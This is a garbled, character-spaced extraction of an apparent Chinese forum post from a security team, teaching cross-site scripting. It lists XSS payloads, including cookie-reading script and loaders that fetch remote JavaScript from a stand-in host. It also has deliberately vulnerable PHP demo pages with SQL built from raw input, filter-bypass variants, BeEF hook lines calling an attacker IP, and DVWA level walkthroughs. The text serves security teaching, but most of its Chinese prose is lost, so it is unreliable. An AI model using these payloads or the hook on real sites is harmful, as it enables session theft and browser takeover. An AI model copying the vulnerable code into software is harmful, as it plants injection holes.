[7562] 2021-04-07_一看就会,一用就废的漏洞XSS

文档创建者:s7ckTeam
浏览次数:6
最后更新:2025-01-17
2021-04-07_一看就会,一用就废的漏洞XSS X S S F 1 2 s e c   2 0 2 1 - 0 4 - 0 7 X S S 广 N S D A   w i s e j a y c r o s s   s i t e   s c r i p t X S S X S S     w e b   访 c o o k i e   X S S     J a v a S c r i p t     < s c r i p t > a l e r t ( ' x s s ' ) < / s c r i p t >   # x s s   < s c r i p t > a l e r t ( d o c u m e n t . c o o k i e ) < / s c r i p t > # c o o k i e   < s c r i p t   s r c = h t t p : / / x x x . c o m / x s s . j s > < / s c r i p t > # j s   < i m g   s r c = 1   o n e r r o r = a l e r t ( ' x s s ' ) > #   < i m g   s r c = 1   o n e r r o r = d o c u m e n t . b o d y . a p p e n d C h i l d ( d o c u m e n t . c r e a t e E l e m e n t ( ' s c r i p t ' ) ) . s r c = " h t t p : / / x x x . c o m / x s s . j s " >   < i n p u t   o n c l i c k = a l e r t ( ' x s s ' ) > #   < i n p u t   o n f o c u s = a l e r t ( ' x s s ' ) > #   < i n p u t   o n m o u s e o v e r = a l e r t ( ' x s s ' ) > #   < b o d y   o n l o a d = a l e r t ( ' x s s ' ) > #   < a   h r e f = j a v a s c r i p t : a l e r t ( / 1 ) > X X X < / a > # X X X X S S X S S 广 广 N S D A   . < s c r i p t > i m g U R L h t t p : 1 2 7 . 0 . 0 . 1 / x s s . p h p ? n a m e = w i s e j a y h t t p : 1 2 7 . 0 . 0 . 1 / x s s . p h p ? n a m e = < s c r i p t > a l e r t ( " x s s " ) < / s c r i p t >
X S S X S S   / / 1 . h t m l   < h t m l >           < h e a d >                   < t i t l e > < / t i t l e >           < / h e a d >           < b o d y >                   < f o r m   a c t i o n = " x s s . p h p "   m e t h o d = " p o s t " >                           < i n p u t   t y p e = " t e x t "   n a m e = " n a m e " / >                           < i n p u t   t y p e = " s u b m i t "   v a l u e = " " >                   < / f o r m >           < / b o d y >   < / h t m l >   / / x s s . p h p   < ? p h p           $ n a m e = $ _ P O S T [ " n a m e " ] ;   e c h o   $ n a m e ;   ? > X S S   < i n p u t   t y p e = " t e x t "   n a m e = " c o n t e n t "   v a l u e = " > v a l u e : 访   / /   c r e a t e   d a t a b a s e   t e s t ; < s c r i p t > a l e r t ( ' x s s ' ) < / s c r i p t > X S S U R L ( ) < s c r i p t > a l e r t ( x s s ) < / s c r i p t >
  u s e   t e s t ;   c r e a t e   t a b l e   x s s (   i d   i n t ( 3 )   n o t   n u l l ,   n a m e   v a r c h a r ( 2 0 0 )   n o t   n u l l ,   p r i m a r y   k e y ( i d )   ) ;   / / 2 . h t m l   < h t m l >           < h e a d >                   < t i t l e > < / t i t l e >           < / h e a d >           < b o d y >                   < f o r m   a c t i o n = " s a v e . p h p "   m e t h o d = " p o s t " >                         I D : < i n p u t   t y p e = " t e x t "   n a m e = " i d " / > < b r / >                         N A M E : < i n p u t   t y p e = " t e x t "   n a m e = " n a m e " / > < b r / >                           < i n p u t   t y p e = " s u b m i t "   v a l u e = " " >                   < / f o r m >           < / b o d y >   < / h t m l >   / / s a v e . p h p   < ? p h p           $ i d = $ _ P O S T [ " i d " ] ;   $ n a m e = $ _ P O S T [ " n a m e " ] ;   m y s q l _ c o n n e c t ( " l o c a l h o s t " , " r o o t " , " r o o t " ) ;   m y s q l _ s e l e c t _ d b ( " t e s t " ) ;     $ s q l = " i n s e r t   i n t o   x s s   v a l u e   ( $ i d , ' $ n a m e ' ) " ;   $ r e s u l t = m y s q l _ q u e r y ( $ s q l ) ;   ? >   / / s h o w . p h p   < ? p h p   $ i d = $ _ G E T [ " i d " ] ;   m y s q l _ c o n n e c t ( " l o c a l h o s t " , " r o o t " , " r o o t " ) ;   m y s q l _ s e l e c t _ d b ( " t e s t " ) ;     $ s q l = " s e l e c t   n a m e   f r o m   x s s   w h e r e   i d = $ i d " ;   $ r e s u l t = m y s q l _ q u e r y ( $ s q l ) ;           w h i l e ( $ r o w = m y s q l _ f e t c h _ a r r a y ( $ r e s u l t ) ) {                 e c h o   $ r o w [ ' n a m e ' ] ;           }     ? > < s c r i p t > a l e r t ( ' x s s ' ) < / s c r i p t >
D O M p a y l o a d : 访 H T M L H T M L D O M   / / 3 . h t m l   < h t m l >           < h e a d >                   < t i t l e > D O M < / t i t l e >           < / h e a d >           < b o d y >                   < f o r m   a c t i o n = " d o m . p h p "   m e t h o d = " p o s t " >                           < i n p u t   t y p e = " t e x t "   n a m e = " n a m e " >                           < i n p u t   t y p e = " s u b m i t "   v a l u e = " " >                   < / f o r m >           < / b o d y >   < / h t m l >   / / d o m . p h p   < ? p h p   $ n a m e = $ _ P O S T [ " n a m e " ] ;   ? >   < i n p u t   i d = " t e x t "   t y p e = " t e x t "   v a l u e = " < ? p h p   e c h o   $ n a m e ; ? > " / >   < d i v   i d = " p r i n t " > < / d i v >   < s c r i p t   t y p e = " t e x t / j a v a s c r i p t " >           v a r   t e x t = d o c u m e n t . g e t E l e m e n t B y I d ( " t e x t " ) ;           v a r   p r i n t = d o c u m e n t . g e t E l e m e n t B y I d ( " p r i n t " ) ;           p r i n t . i n n e r H T M L = t e x t . v a l u e ;   < / s c r i p t > h t t p : / / 1 2 7 . 0 . 0 . 1 / x s s / s h o w . p h p ? i d = 1 D O M   D O M ( D o c u m e n t O b j e c t M o d e l ) h t t p : / / 1 2 7 . 0 . 0 . 1 / d o m . p h p ? n a m e = < i m g   s r c = 1   o n e r r o r = a l e r t ( " x s s " ) > < i m g   s r c = 1   o n e r r o r = a l e r t ( ' x s s ' ) >
X S S D O M 访 X S S U R L 访 访 X S S U R L U R L U R L w e b w e b J a v a S c r i p t H T T P H T T P D O M - - > - - > - - > - - > - - > - - > - - > X S S U R L B a s e 6 4 < I m G   S r C = 1   O n e r R o r = a l e r t ( ' x s s ' ) > < i m i m g g   s r s r c c = 1   o n e r r o r = a l e r t ( ' x x s ' ) > < i m g   s r c = 1   o n e r r o r = a l e r t ( x s s ` ` ) >
H T M L   < ! - -     - - > p a y l o a d   < ! - -   - - > < s c r i p t > a l e r t ( ' x s s ' ) < / s c r i p t > < ! - -   - - >   < d i v   = " x x x " > < / d i v > p a y l o a d   < d i v > < / d i v > < s c r i p t > a l e r t ( ' x s s ' ) < / s c r i p t > < d i v   a = " x x x " > < / d i v >   < d i v   i d = " " > < / d i v > p a y l o a d   < d i v   i d = " " > < / d i v > < s c r i p t > a l e r t ( ' x s s ' ) < / s c r i p t > < d i v   a = " x " > < / d i v >   <   i d = " x x "   / > p a y l o a d   < > < s c r i p t > a l e r t ( ' x s s ' ) < / s c r i p t > < b   i d = " x x "   / > C S S   < s t y l e > < / s t y l e > p a y l o a d   < s t y l e > < / s t y l e > < s c r i p t > a l e r t ( ' x s s ' ) < / s c r i p t > < s t y l e > < / s t y l e >   < i n p u t   n a m e = k e y w o r d     v a l u e = ' ' > - - > < s c r i p t > a l e r t ( ' x s s ' ) < / s c r i p t > < ! - - < / d i v > < s c r i p t > a l e r t ( ' x s s ' ) < / s c r i p t > < d i v   a " > < / d i v > < s c r i p t > a l e r t ( ' x s s ' ) < / s c r i p t > < d i v   a = " x > < s c r i p t > a l e r t ( ' x s s ' ) < / s c r i p t > < b < / s t y l e > < s c r i p t > a l e r t ( ' x s s ' ) < / s c r i p t > < s t y l e >
p a y l o a d   < i n p u t   n a m e = k e y w o r d     v a l u e = ' '   o n f o c u s = ' a l t e r ( / x s s / ) ' > 使 使 ( B e e f ) k a l i   # b e e f   b e e f - x s s   # x s s   [ * ]       H o o k :   < s c r i p t   s r c = " h t t p : / / < I P > : 3 0 0 0 / h o o k . j s " > < / s c r i p t >   [ * ]   E x a m p l e :   < s c r i p t   s r c = " h t t p : / / 1 2 7 . 0 . 0 . 1 : 3 0 0 0 / h o o k . j s " > < / s c r i p t >   # w e b   U I   [ * ]   W e b   U I :   h t t p : / / 1 2 7 . 0 . 0 . 1 : 3 0 0 0 / u i / p a n e l U I x s s 线 '   o n f o c u s = ' a l t e r ( / x s s / ) < s c r i p t   s r c = " h t t p : / / < I P > : 3 0 0 0 / h o o k . j s " > < / s c r i p t >
L O W X S S < s c r i p t > a l e r t ( ' x s s ' ) < / s c r i p t >
M E D I U M i m g 使 H I G H , 使 < s c r i p t > < / s c r i p t > < i m g   s r c = 1   o n e r r o r = a l e r t ( ' x s s ' ) > < s c r i p t > < i m g   s r c = 1   o n e r r o r = a l e r t ( ' x s s ' ) >
L O W n a m e m e s s a g e M E D I U M , m e s s a g e n a m e n a m e t e s t < s c r i p t > a l e r t ( ' x s s ' ) < / s c r i p t > < s c r i p t > i m g
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则